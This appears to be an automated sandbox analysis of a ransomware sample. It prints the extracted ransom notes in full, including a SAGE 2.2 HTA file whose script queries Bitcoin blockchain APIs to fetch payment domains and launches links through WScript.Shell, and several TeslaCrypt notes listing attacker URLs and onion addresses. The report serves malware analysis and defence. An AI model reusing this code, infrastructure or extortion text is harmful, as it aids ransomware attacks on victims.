Analysis

  • max time kernel
    63s
  • max time network
    172s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    19-11-2024 20:15

General

  • Target

    RNSM00283.7z

  • Size

    6.7MB

  • MD5

    6bfc7d60783ddf8785dc71676fb6b847

  • SHA1

    3148bfc1ab30faace7543ab5344d6cd657e91957

  • SHA256

    f268b4358e59a47f6cf3c31f1248db26ad6c4da81dc158b20e6b6b46c41d5d9f

  • SHA512

    f564edd457972881138c231c115a137da07a4cbf7e05396a986358d4f3d077a2df80f1e6841ba9789aa447b5c17298181e9d63fcd98ac73fc94da43830d8bd27

  • SSDEEP

    196608:oLCbo/oy71gjrn4YGcPFJut6dlgvnh+UbPFMpQhg:o+uf6Xfuaqh1Pqcg

Malware Config

Extracted

Path

C:\!HELP_SOS.hta

Ransom Note
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Decryption Instructions</title> <HTA:APPLICATION ID='App' APPLICATIONNAME="Decryption Instructions" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize"> <style> a { color: #04a; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #222; font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif; font-size: 12pt; line-height: 16pt; } body, h1 { margin: 0; padding: 0; } h1 { color: #555; text-align: center; padding-bottom: 1.5em; } h2 { color: #555; text-align: center; } ol li { padding-bottom: 13pt; } .container { background-color: #EEE; border: 2pt solid #C7C7C7; margin: 3%; min-width: 600px; padding: 5% 10%; color: #444; } .filecontainer{ padding: 5% 10%; display: none; } .header { border-bottom: 2pt solid #c7c7c7; padding-bottom: 5%; } .hr { background: #bda; display: block; height: 2pt; margin-top: 1.5%; margin-bottom: 1.5%; overflow: hidden; width: 100%; } .key{ background-color: #A1D490; border: 1px solid #506A48; display: block; text-align: center; margin: 0.5em 0; padding: 1em 1.5em; word-wrap: break-word; } .keys{ margin: 3em 0; } .filename{ border: 3px solid #AAA; display: block; text-align: center; margin: 0.5em 0em; padding: 1em 1.5em; background-color: #DCC; } .us{ text-decoration: strong; color: #333; } .info{ background-color: #E4E4E4; padding: 0.5em 3em; margin: 1em 0; } .text{ text-align: justify; } #file{ background-color: #FCC; } .lsb{ display: none; margin: 3%; text-align: center; } .ls{ border: 1px solid #888; border-radius: 3px; padding: 0 0.5em; margin: 1em 0.1em; line-height: 2em; display: inline-block; } .ls:hover{ background-color: #D0D0D0; } .l{ display:none; } .lu{ display:none; } </style> <script language="vbscript"> Function GetCmd GetCmd = App.commandLine End Function </script> <script language="javascript"> function openlink(url){ new ActiveXObject("WScript.Shell").Run(url); return false; } function aIndexOf(arr, v){ for(var i = 0; i < arr.length; i++) if(arr[i] == v) return i; return -1; } function tweakClass(cl, f){ var els; if(document.getElementByClassName != null){ els = document.getElementsByClassName(cl); } else{ els = []; var tmp = document.getElementsByTagName('*'); for (var i = 0; i < tmp.length; i++){ var c = tmp[i].className; if( (c == cl) || ((c.indexOf(cl) != 1) && ((' '+c+' ').indexOf(' '+cl+' ') != -1)) ) els.push(tmp[i]); } } for(var i = 0; i < els.length; i++) f(els[i]); } function show(el){ el.style.display = 'block'; } function hide(el){ el.style.display = 'none'; } var langs = ["en","de","it","pt","es","fr","kr","nl","ar","fa","zh"]; function setLang(lang){ if(aIndexOf(langs, lang) == -1) lang = langs[0]; for(var i = 0; i < langs.length; i++){ var clang = langs[i]; tweakClass('l-'+clang, function(el){ el.style.display = (clang == lang) ? 'block' : 'none'; }); tweakClass('ls-'+clang, function(el){ el.style.backgroundColor = (clang == lang) ? '#BBB' : ''; }); } } function newXHR() { if (window.XMLHttpRequest) return new window.XMLHttpRequest; try { return new ActiveXObject("MSXML2.XMLHTTP.3.0"); } catch(error) { return null; } } function getPage(url, cb) { try{ var xhr = newXHR(); if(!xhr) return cb('no xhr'); xhr.onreadystatechange = function() { if(xhr.readyState != 4) return; if(xhr.status != 200 || !xhr.responseText) return cb(xhr.status) cb(null, xhr.responseText); }; xhr.open("GET", url+((url.indexOf('?') == -1) ? "?" : "&") + "_=" + new Date().getTime(), true); xhr.send(); } catch(e){ cb(e); } } function decodeTxString(hex){ var m = '0123456789abcdef'; var s = ''; var c = 0xAA; hex = hex.toLowerCase(); for(var i = 0; i < hex.length; i+=2){ var a = m.indexOf(hex.charAt(i)); var b = m.indexOf(hex.charAt(i+1)); if(a == -1 || b == -1) throw hex[i]+hex[i+1]+' '+a+' '+b; s+= String.fromCharCode(c = (c ^ ((a << 4) | b))); } return s; } var OR = 'OP_RE'+'TURN '; var sources = [ {bp:'btc.b'+'lockr.i'+'o/api/v1/', txp:'tx/i'+'nfo/', adp:'add'+'ress/txs/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = 0; i < json.data.txs.length - 1; i++) res.push(json.data.txs[i].tx); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.vouts; for(var i = 0; i < os.length; i++) if(os[i].extras.asm.indexOf(OR) == 0) return decodeTxString(os[i].extras.asm.substr(10)); return null; } }, {bp:'ch'+'ain.s'+'o/api/v2/', txp:'get_t'+'x_out'+'puts/btc/', adp:'get_tx_uns'+'pent/btc/', ptxs: function(json){ if(json.status != 'success') return null; var res = []; for(var i = json.data.txs.length - 1; i >= 0; i--) res.push(json.data.txs[i].txid); return res; }, ptx: function(json){ if(json.status != 'success') return null; var os = json.data.outputs; for(var i = 0; i < os.length; i++) if(os[i].script.indexOf(OR) == 0) return decodeTxString(os[i].script.substr(10)); return null; } }, {bp:'bit'+'aps.co'+'m/api/', txp:'trans'+'action/', adp:'ad'+'dress/tra'+'nsactions/', adpb:'/0/sen'+'t/all', ptxs: function(json){ var res = []; for(var i = 0; i < json.length; i++) res.push(json[i][1]); return res; }, ptx: function(json){ var os = json.output; for(var i = 0; i < os.length; i++) if(os[i].script.asm.indexOf(OR) == 0) return decodeTxString(os[i].script.asm.substr(10)); return null; } }, {bp:'api.b'+'lockcyp'+'her.com/v1/b'+'tc/main/', txp:'txs/', adp:'addrs/', ptxs: function(json){ var res = []; var m = {}; for(var i = 0; i < json.txrefs.length; i++){ var tx = json.txrefs[i].tx_hash; if(m[tx]) continue; m[tx] = 1; res.push(tx); } return res; }, ptx: function(json){ var os = json.outputs; for(var i = 0; i < os.length; i++) if(os[i].data_hex != null) return decodeTxString(os[i].data_hex); return null; } } ]; function eachUntil(a,f,c){ var i = 0; var n = function(){ if(i >= a.length) return c('f'); f(a[i++], function(err, res){ if(err == null) return c(null, res); n(); }); }; n(); } function getJson(url, cb){ getPage(url, function(err, res){ if(err != null) return cb(err); var json; try{ if(window.JSON && window.JSON.parse){ json = window.JSON.parse(res); } else{ json = eval('('+res+')'); } } catch(e){ cb(e); } cb(null, json); }); } function getDomains(ad, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp; url+= s.adp+ad; if(s.adpb) url+= s.adpb; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptxs(json)); } catch(e){ cb(e); } }); }, function(err, txs){ if(err != null) return cb(err); if(txs.length == 0) return cb('f'); eachUntil(txs, function(tx, cb){ eachUntil(sources, function(s, cb){ var url = 'http://'+s.bp+s.txp+tx; getJson(url, function(err, json){ if(err != null) return cb(err); try{ cb(null, s.ptx(json)); } catch(e){ cb(e); } }); }, function(err, res){ if(err != null) return cb(err); if(res == null) return cb('f'); cb(null, res.split(':')); }); }, cb); }); } function updateLinks(){ tweakClass('lu', hide); tweakClass('lu-updating', show); getDomains('1783wBG'+'sr'+'1zkxenfE'+'ELXA25PLSkL'+'dfJ4B7', function(err, ds){ tweakClass('lu', hide); if(err != null){ tweakClass('lu-error', show); tweakClass('links', function(el){ el.innerHTML = err; }); return; } tweakClass('lu-done', show); var html = ''; for(var i = 0; i < ds.length; i++) html+= '<div class="key"><a href="http://7gie6ffnkrjykggd.'+ds[i]+'/login/AdPxnxGh7KK810UYdlvbiQvCXSv4N2l6IyodxWyW31g9_xQRuzqwRzzA" onclick="javascript:return openlink(this.href)">http://7gie6ffnkrjykggd.'+ds[i]+'/</a></div>'; tweakClass('links', function(el){ el.innerHTML = html; }); }); return false; } function onPageLoaded(){ try{ tweakClass('lsb', show); }catch(e){} try{ tweakClass('lu-orig', show); }catch(e){} try{ setLang('en'); }catch(e){} try{ var args = GetCmd().match(/"[^"]+"|[^ ]+/g); if(args.length > 1){ var file = args[args.length-1]; if(file.charAt(0) == '"' && file.charAt(file.length-1) == '"') file = file.substr(1, file.length-2); document.getElementById('filename').innerHTML = file; show(document.getElementById('file')); document.title = 'File is encrypted'; } }catch(e){} } </script> </head> <body onload='javascript:onPageLoaded()'> <div class='lsb'> <span class='ls ls-en' onclick="javascript:return setLang('en')">English</span> <span class='ls ls-de' onclick="javascript:return setLang('de')">Deutsch</span> <span class='ls ls-it' onclick="javascript:return setLang('it')">Italiano</span> <span class='ls ls-pt' onclick="javascript:return setLang('pt')">Português</span> <span class='ls ls-es' onclick="javascript:return setLang('es')">Español</span> <span class='ls ls-fr' onclick="javascript:return setLang('fr')">Français</span> <span class='ls ls-kr' onclick="javascript:return setLang('kr')">한국어</span> <span class='ls ls-nl' onclick="javascript:return setLang('nl')">Nederlands</span> <span class='ls ls-ar' onclick="javascript:return setLang('ar')">العربية</span> <span class='ls ls-fa' onclick="javascript:return setLang('fa')">فارسی</span> <span class='ls ls-zh' onclick="javascript:return setLang('zh')">中文</span> </div> <div id='file' class='container filecontainer'> <div class='filename'> <div style='float:left; padding:18px 0'><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADEAAABACAYAAACz4p94AAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAARCQAAEQkAGJrNK4AAAAB3RJTUUH4QEcFBoaYAOrHQAABThJREFUaN7tmlloXGUUx3/3ziRtTa2xcZ1gtaJFDFjtwSqllaKiiEilKOKDNS2UivXF+qD0QRBRUMQXN/TBBcFifahYFC0urfpghSMqaDSkdQMvojZpIk2zTMaHe776MZ17M6u9ozkwzAwz3/ed/9m+s9yABkhEUFX/+43ATcBy4FxgMdABTAB/Aj8CXwO7VfVdb10AlPy9aqGgTuYDVS3Z56XA48AtdWz1OrBdVQ82AiaoVfJATlWLIrIAeAbYWKciS975LwJ3q+pEJQ03DYRJKVDVGRFZCew0kylnqFaaAULgB+B2Vd1fru3ZKFcDAFS1JCLXA7uBMxs1S29t0fzn5kKhMBBF0WAURYgIURQ1DsIAhKaBVcAbwKk0l0JgGlgIrCkUChpF0U/VAgmrOCBvPrAEeBY4jdZQ3jRyDvCEiJxl2ne+mLowTQs5VZ0yJ95mobMaRx0A3gMGgSPAycCFwHXARQlrfKFeDjwMbG7IsT0zKorIauBtYFGFvxY9s3wZ2Kaqwyn7dgNPpkQ1t9/PwGZV3TNbxErThAOwCOhPADBtexwGNqrqrrR4bxFnBNgkIm8CrwFdCX66BNgA7KlLE2aDeVWdFpHlwPsVfMEBGAXuUtUd1YRGH6CIrLdAESZoYxC4Q1U/r8exQwMQAFdb+CuP7U6LO6oF4MK0d+47ZlpJfJ0HXFsm3OpB2HsPsCZBUtgF9VSZo85KFq7zqnrUTOq3ChYyA3QCq7x1NYFwZnYKsKJCFOqwz59YJKo5VTAmAQ4CuxKiHUCviCyryZzMhIqeOnsSDh8B9qnqTJqU0kKyAT8MfJwiyB5gWa0+ETjGgPOBeQkSGgG+rPdmM99wfjUEHEoA0Q0srRmEaSRv+VFHAogx84lGyO01ChxI+E8XcHq9aUdnhahU8uL471bszJoWVEFHbL8kHhfXCyIE5qesGXX+UW9F5mli0jSbRPMaAdGZ8vtUtSG1ykg1mXIRdzaaxVYjSU7kPmFKaAsq5DW+dBY2WAyV89GV8ntXran4tGfzW4B7K0grAI5WMIF6zAjgD2ATsDXhrPFaGwGZJhE59jrOPMraMIuBK4EzTFqlE8x7YNr6TFUP+dkwQCAiobuhRWQt8DTQl2FlfAtsVdW9DoyviUeA7U1owbSSfL4eU9UHjlVRInI/8FDGATizcvytLhQKQRRFewMRuQJ4y+y/Xcg13IaA/tBCWxftRe5+uwC4NQTWzpabZFgbAFeF1qzKtSEIp40+l+QFtC91hvwHaA7E/xlEKesgZrz6u19VA/eytH64FUGkmSCKtt8XwKWq+opL0GxE8AKwknh6mkkQ03bXRMTT0F9d7m/pfdGy5SHgPtclyRoIZyLfAR95APC6If4A5sOsgfB7UQe88jbJoceI+6+ZdeyOKrWWzxqIwJN+H/F8rlJDzR8XrMiyT1wM3OnX7V797oBeQzxYbF6lJCLTTcpi3fhrBNiiqjsrNCBuIx5Ozs+qT+SJW5vdxHPoS3yHlrjH8nyzAbTCsZ1ZjfPPoMa/DMdpAc0lgHMg2gREqcxPSrSoHdoqx+4Ceu3Sc4x3c/wkNpMgclZT9AIPisjZFl57gUeZZeKThcuuvDhyAppsFfOt9gl/385/w7FLtDmFwF9ebdxO5IQ/HBIPLabaGMT+kLitP9GGAELi4ecHIfAqyc9VZJWc+SvwUi6KorFCofANsA44qQ0AuEfrfgHuUdWB0IqWT4Ebml3At4hywPfAelXd5y47sIfY7XbdQNytuwxYkCHmR4GvgOfcM4fGL38Dzdjo/H/3PFAAAAAASUVORK5CYII=" style='padding:0 7.5px'/></div> <div> <h2 class='l l-en' style='display:block'>The file is encrypted but can be restored</h2> <h2 class='l l-de' >Die Datei ist verschlüsselt, aber kann wiederhergestellt werden</h2> <h2 class='l l-it' >Il file è crittografato, ma può essere ripristinato</h2> <h2 class='l l-pt' >O arquivo está criptografado, mas poderá ser descriptografado</h2> <h2 class='l l-es' >El archivo está encriptado pero puede ser restaurado</h2> <h2 class='l l-fr' >Le fichier est crypté mais peut être restauré</h2> <h2 class='l l-kr' >파일은 암호화되었지만 복원 할 수 있습니다</h2> <h2 class='l l-nl' >Het bestand is versleuteld maar kan worden hersteld</h2> <h2 class='l l-ar' > الملف مشفر لكن من الممكن إسترجاعه </h2> <h2 class='l l-fa' >این فایل رمزگذاری شده است اما می تواند بازیابی شود</h2> <h2 class='l l-zh' >文件已被加密,但是可以解密</h2> <p><span id='filename'></span></p> </div> </div> <h2>The file you tried to open and other important files on your computer were encrypted by "SAGE 2.2 Ransomware".</h2> <h2>Action required to restore your files.</h2> </div> <div class='container'> <div class="text l l-en" style='display:block'> <h1>File recovery instructions</h2> <p>You probably noticed that you can not open your files and that some software stopped working correctly.</p> <p>This is expected. Your files content is still there, but it was encrypted by <span class='us'>"SAGE 2.2 Ransomware"</span>.</p> <p>Your files are not lost, it is possible to revert them back to normal state by decrypting.</p> <p>The only way you can do that is by getting <span class='us'>"SAGE Decrypter"</span> software and your personal decryption key.</p> <div class='info'> <p>Using any other software which claims to be able to restore your files will result in files being damaged or destroyed.</p> </div> <p>You can purchase <span class='us'>"SAGE Decrypter"</span> software and your decryption key at your personal page you can access by following links:</p> <div class='keys links'> <div class='key'> <a href="http://7gie6ffnkrjykggd.2kzm0f.com/login/AdPxnxGh7KK810UYdlvbiQvCXSv4N2l6IyodxWyW31g9_xQRuzqwRzzA" onclick='javascript:return openlink(this.href)'>http://7gie6ffnkrjykggd.2kzm0f.com/</a> </div> <div class='key'> <a href="http://7gie6ffnkrjykggd.l3nq0.net/login/AdPxnxGh7KK810UYdlvbiQvCXSv4N2l6IyodxWyW31g9_xQRuzqwRzzA" onclick='javascript:return openlink(this.href)'>http://7gie6ffnkrjykggd.l3nq0.net/</a> </div> </div> <div class='info lu lu-orig'> <p>If none of these links work for you, <a href='#' onclick='javascript:return updateLinks()'><b>click here</b></a> to update the list.</p> </div> <div class='info lu lu-updating'> <p>Updating links...</p> </div> <div class='info lu lu-error'> <p>Something went wrong while updating links, please wait some time and <a href='#' onclick='javascript:return updateLinks()'><b>try again</b></a> or use "Tor Browser" method below.</p> </div> <div class='info lu lu-done'> <p>Links updated, if new ones still don't work, please wait some time and <a href='#' onclick='javascript:return updateLinks()'><b>try again</b></a> or use "Tor Browser" method below.</p> </div> <p>If you are asked for your personal key, copy it to the form on the site. This is your personal key:</p> <div class='keys'> <div class='key'> AdPxnxGh7KK810UYdlvbiQvCXSv4N2l6IyodxWyW31g9_xQRuzqwRzzA </div> </div> <p>You will also be able to decrypt one file for free to make sure "SAGE Decrypter" software is able to recover your files</p> <div class='info'> <p>If none of those links work for you for a prolonged period of time or you need your files recovered as fast as possible, you can also access your personal page using "Tor Browser".</p> <p>In order to do that you need to:</p> <ol> <li>open Internet Explorer or any other internet browser;</li> <li>copy the address <a href='https://www.torproject.org/download/download-easy.html.en' onclick='javascript:return openlink(this.href)'>https://www.torproject.org/download/download-easy.html.en</a> into address bar and press "Enter";</li> <li>once the page opens, you will be offered to download Tor Browser, download it and run the installator, follow installation instructions;</li> <li>once install
URLs

http://'+s.bp

http://'+s.bp+s.txp+tx

Extracted

Path

C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_RECoVERY_+dfhfb.txt

Family

teslacrypt

Ransom Note
NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ? All of your files were protected by a strong encryption with AES More information about the encryption keys using AES can be found here: http://en.wikipedia.org/wiki/AES How did this happen ? !!! Specially for your PC was generated personal AES KEY, both public and private. !!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet. !!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server What do I do ? So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way. If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment. For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1. http://yyre45dbvn2nhbefbmh.begumvelic.at/C04CE3DBCFA368A 2. http://uiredn4njfsa4234bafb32ygjdawfvs.frascuft.com/C04CE3DBCFA368A 3. http://gwe32fdr74bhfsyujb34gfszfv.zatcurr.com/C04CE3DBCFA368A If for some reasons the addresses are not available, follow these steps: 1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. After a successful installation, run the browser 3. Type in the address bar: xlowfznrg4wf7dli.onion/C04CE3DBCFA368A 4. Follow the instructions on the site. ---------------- IMPORTANT INFORMATION------------------------ *-*-* Your personal pages: http://yyre45dbvn2nhbefbmh.begumvelic.at/C04CE3DBCFA368A http://uiredn4njfsa4234bafb32ygjdawfvs.frascuft.com/C04CE3DBCFA368A http://gwe32fdr74bhfsyujb34gfszfv.zatcurr.com/C04CE3DBCFA368A *-*-* Your personal page Tor-Browser: xlowfznrg4wf7dli.ONION/C04CE3DBCFA368A
URLs

http://yyre45dbvn2nhbefbmh.begumvelic.at/C04CE3DBCFA368A

http://uiredn4njfsa4234bafb32ygjdawfvs.frascuft.com/C04CE3DBCFA368A

http://gwe32fdr74bhfsyujb34gfszfv.zatcurr.com/C04CE3DBCFA368A

http://xlowfznrg4wf7dli.ONION/C04CE3DBCFA368A

Extracted

Path

C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_ReCoVeRy_+vtjds.txt

Family

teslacrypt

Ransom Note
NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ? All of your files were protected by a strong encryption with RSA4096 More information about the encryption keys using RSA4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem) How did this happen ? !!! Specially for your PC was generated personal RSA4096 Key , both public and private. !!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet. !!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server What do I do ? So , there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1 - http://po4dbsjbneljhrlbvaueqrgveatv.bonmawp.at/94375AE434653919 2 - http://u54bbnhf354fbkh254tbkhjbgy8258gnkwerg.tahaplap.com/94375AE434653919 3 - http://w6bfg4hahn5bfnlsafgchkvg5fwsfvrt.hareuna.at/94375AE434653919 If for some reasons the addresses are not available, follow these steps: 1 - Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2 - After a successful installation, run the browser 3 - Type in the address bar: xlowfznrg4wf7dli.onion/94375AE434653919 4 - Follow the instructions on the site IMPORTANT INFORMATION Your personal pages http://po4dbsjbneljhrlbvaueqrgveatv.bonmawp.at/94375AE434653919 http://u54bbnhf354fbkh254tbkhjbgy8258gnkwerg.tahaplap.com/94375AE434653919 http://w6bfg4hahn5bfnlsafgchkvg5fwsfvrt.hareuna.at/94375AE434653919 Your personal page Tor-Browser xlowfznrg4wf7dli.ONION/94375AE434653919
URLs

http://po4dbsjbneljhrlbvaueqrgveatv.bonmawp.at/94375AE434653919

http://u54bbnhf354fbkh254tbkhjbgy8258gnkwerg.tahaplap.com/94375AE434653919

http://w6bfg4hahn5bfnlsafgchkvg5fwsfvrt.hareuna.at/94375AE434653919

http://xlowfznrg4wf7dli.ONION/94375AE434653919

Extracted

Path

C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+bdhsn.txt

Ransom Note
__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ? All of your files were protected by a strong encryption with RSA-4096. More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem) How did this happen ? !!! Specially for your PC was generated personal RSA-4096 KEY, both public and private. !!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet. !!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server What do I do ? So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way. If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment. For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: 1. http://prest54538hnksjn4kjfwdbhwere.hotchunman.com/C04CE3DBCFA368A 2. http://b4youfred5485jgsa3453f.italazudda.com/C04CE3DBCFA368A 3. http://5rport45vcdef345adfkksawe.bematvocal.at/C04CE3DBCFA368A If for some reasons the addresses are not available, follow these steps: 1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. After a successful installation, run the browser and wait for initialization 3. Type in the address bar: fwgrhsao3aoml7ej.onion/C04CE3DBCFA368A 4. Follow the instructions on the site. ---------------- IMPORTANT INFORMATION------------------------ *-*-* Your personal pages: http://prest54538hnksjn4kjfwdbhwere.hotchunman.com/C04CE3DBCFA368A http://b4youfred5485jgsa3453f.italazudda.com/C04CE3DBCFA368A http://5rport45vcdef345adfkksawe.bematvocal.at/C04CE3DBCFA368A *-*-* Your personal page Tor-Browser: fwgrhsao3aoml7ej.ONION/C04CE3DBCFA368A *-*-* Your personal identification ID: C04CE3DBCFA368A
URLs

http://prest54538hnksjn4kjfwdbhwere.hotchunman.com/C04CE3DBCFA368A

http://b4youfred5485jgsa3453f.italazudda.com/C04CE3DBCFA368A

http://5rport45vcdef345adfkksawe.bematvocal.at/C04CE3DBCFA368A

http://fwgrhsao3aoml7ej.onion/C04CE3DBCFA368A

http://fwgrhsao3aoml7ej.ONION/C04CE3DBCFA368A

Extracted

Path

C:\Users\Admin\Documents\!HELP_SOS.hta

Ransom Note
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>Decryption Instructions</title> <HTA:APPLICATION ID='App' APPLICATIONNAME="Decryption Instructions" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize"> <style> a { color: #04a; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #222; font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif; font-size: 12pt; line-height: 16pt; } body, h1 { margin: 0; padding: 0; } h1 { color: #555; text-align: center; padding-bottom: 1.5em; } h2 { color: #555; text-align: center; } ol li { padding-bottom: 13pt; } .container { background-color: #EEE; border: 2pt solid #C7C7C7; margin: 3%; min-width: 600px; padding: 5% 10%; color: #444; } .filecontainer{ padding: 5% 10%; display: none; } .header { border-bottom: 2pt solid #c7c7c7; padding-bottom: 5%; } .hr { background: #bda; display: block; height: 2pt; margin-top: 1.5%; margin-bottom: 1.5%; overflow: hidden; width: 100%; } .key{ background-color: #A1D490; border: 1px solid #506A48; display: block; text-align: center; margin: 0.5em 0; padding: 1em 1.5em; word-wrap: break-word; } .keys{ margin: 3em 0; } .filename{ border: 3px solid #AAA; display: block; text-align: center; margin: 0.5em 0em; padding: 1em 1.5em; background-color: #DCC; } .us{ text-decoration: strong; color: #333; } .info{ background-color: #E4E4E4; padding: 0.5em 3em; margin: 1em 0; } .text{ text-align: justify; } #file{ background-color: #FCC; } .lsb{ display: none; margin: 3%; text-align: center; } .ls{ border: 1px solid #888; border-radius: 3px; padding: 0 0.5em; margin: 1em 0.1em; } .ls:hover{ background-color: #D0D0D0; } .l{ display:none; } </style> <script language="vbscript"> Function GetCmd GetCmd = App.commandLine End Function </script> <script language="javascript"> function openlink(url){ new ActiveXObject("WScript.Shell").Run(url); return false; } function aIndexOf(arr, v){ for(var i = 0; i < arr.length; i++) if(arr[i] == v) return i; return -1; } function tweakClass(cl, f){ var els; if(document.getElementByClassName != null){ els = document.getElementsByClassName(cl); } else{ els = []; var tmp = document.getElementsByTagName('*'); for (var i = 0; i < tmp.length; i++){ var c = tmp[i].className; if( (c == cl) || ((c != '') && ((' '+c+' ').indexOf(' '+cl+' ') != -1)) ) els.push(tmp[i]); } } for(var i = 0; i < els.length; i++) f(els[i]); } var langs = ["en","de","it","pt","es","fr","kr","nl","ar","fa","zh"]; function setLang(lang){ if(aIndexOf(langs, lang) == -1) lang = langs[0]; for(var i = 0; i < langs.length; i++){ var clang = langs[i]; tweakClass('l-'+clang, function(el){ el.style.display = (clang == lang) ? 'block' : 'none'; }); tweakClass('ls-'+clang, function(el){ el.style.backgroundColor = (clang == lang) ? '#BBB' : ''; }); } } function onPageLoaded(){ try{ tweakClass('lsb', function(el){ el.style.display = 'block'; }); }catch(e){} try{ setLang(en); }catch(e){} try{ var args = GetCmd().match(/"[^"]+"|[^ ]+/g); if(args.length > 1){ var file = args[args.length-1]; if(file.charAt(0) == '"' && file.charAt(file.length-1) == '"') file = file.substr(1, file.length-2); document.getElementById('filename').innerHTML = file; document.getElementById('file').style.display = 'block'; document.title = 'File is encrypted'; } }catch(e){} } </script> </head> <body onload='javascript:onPageLoaded()'> <div class='lsb'> <span class='ls ls-en' onclick="javascript:return setLang('en')">English</span> <span class='ls ls-de' onclick="javascript:return setLang('de')">Deutsch</span> <span class='ls ls-it' onclick="javascript:return setLang('it')">Italiano</span> <span class='ls ls-pt' onclick="javascript:return setLang('pt')">Português</span> <span class='ls ls-es' onclick="javascript:return setLang('es')">Español</span> <span class='ls ls-fr' onclick="javascript:return setLang('fr')">Français</span> <span class='ls ls-kr' onclick="javascript:return setLang('kr')">한국어</span> <span class='ls ls-nl' onclick="javascript:return setLang('nl')">Nederlands</span> <span class='ls ls-ar' onclick="javascript:return setLang('ar')">العربية</span> <span class='ls ls-fa' onclick="javascript:return setLang('fa')">فارسی</span> <span class='ls ls-zh' onclick="javascript:return setLang('zh')">中文</span> </div> <div id='file' class='container filecontainer'> <div class='filename'> <div style='float:left; padding:18px 0'><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADEAAABACAYAAACz4p94AAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAARCQAAEQkAGJrNK4AAAAB3RJTUUH4QEcFBoaYAOrHQAABThJREFUaN7tmlloXGUUx3/3ziRtTa2xcZ1gtaJFDFjtwSqllaKiiEilKOKDNS2UivXF+qD0QRBRUMQXN/TBBcFifahYFC0urfpghSMqaDSkdQMvojZpIk2zTMaHe776MZ17M6u9ozkwzAwz3/ed/9m+s9yABkhEUFX/+43ATcBy4FxgMdABTAB/Aj8CXwO7VfVdb10AlPy9aqGgTuYDVS3Z56XA48AtdWz1OrBdVQ82AiaoVfJATlWLIrIAeAbYWKciS975LwJ3q+pEJQ03DYRJKVDVGRFZCew0kylnqFaaAULgB+B2Vd1fru3ZKFcDAFS1JCLXA7uBMxs1S29t0fzn5kKhMBBF0WAURYgIURQ1DsIAhKaBVcAbwKk0l0JgGlgIrCkUChpF0U/VAgmrOCBvPrAEeBY4jdZQ3jRyDvCEiJxl2ne+mLowTQs5VZ0yJ95mobMaRx0A3gMGgSPAycCFwHXARQlrfKFeDjwMbG7IsT0zKorIauBtYFGFvxY9s3wZ2Kaqwyn7dgNPpkQ1t9/PwGZV3TNbxErThAOwCOhPADBtexwGNqrqrrR4bxFnBNgkIm8CrwFdCX66BNgA7KlLE2aDeVWdFpHlwPsVfMEBGAXuUtUd1YRGH6CIrLdAESZoYxC4Q1U/r8exQwMQAFdb+CuP7U6LO6oF4MK0d+47ZlpJfJ0HXFsm3OpB2HsPsCZBUtgF9VSZo85KFq7zqnrUTOq3ChYyA3QCq7x1NYFwZnYKsKJCFOqwz59YJKo5VTAmAQ4CuxKiHUCviCyryZzMhIqeOnsSDh8B9qnqTJqU0kKyAT8MfJwiyB5gWa0+ETjGgPOBeQkSGgG+rPdmM99wfjUEHEoA0Q0srRmEaSRv+VFHAogx84lGyO01ChxI+E8XcHq9aUdnhahU8uL471bszJoWVEFHbL8kHhfXCyIE5qesGXX+UW9F5mli0jSbRPMaAdGZ8vtUtSG1ykg1mXIRdzaaxVYjSU7kPmFKaAsq5DW+dBY2WAyV89GV8ntXran4tGfzW4B7K0grAI5WMIF6zAjgD2ATsDXhrPFaGwGZJhE59jrOPMraMIuBK4EzTFqlE8x7YNr6TFUP+dkwQCA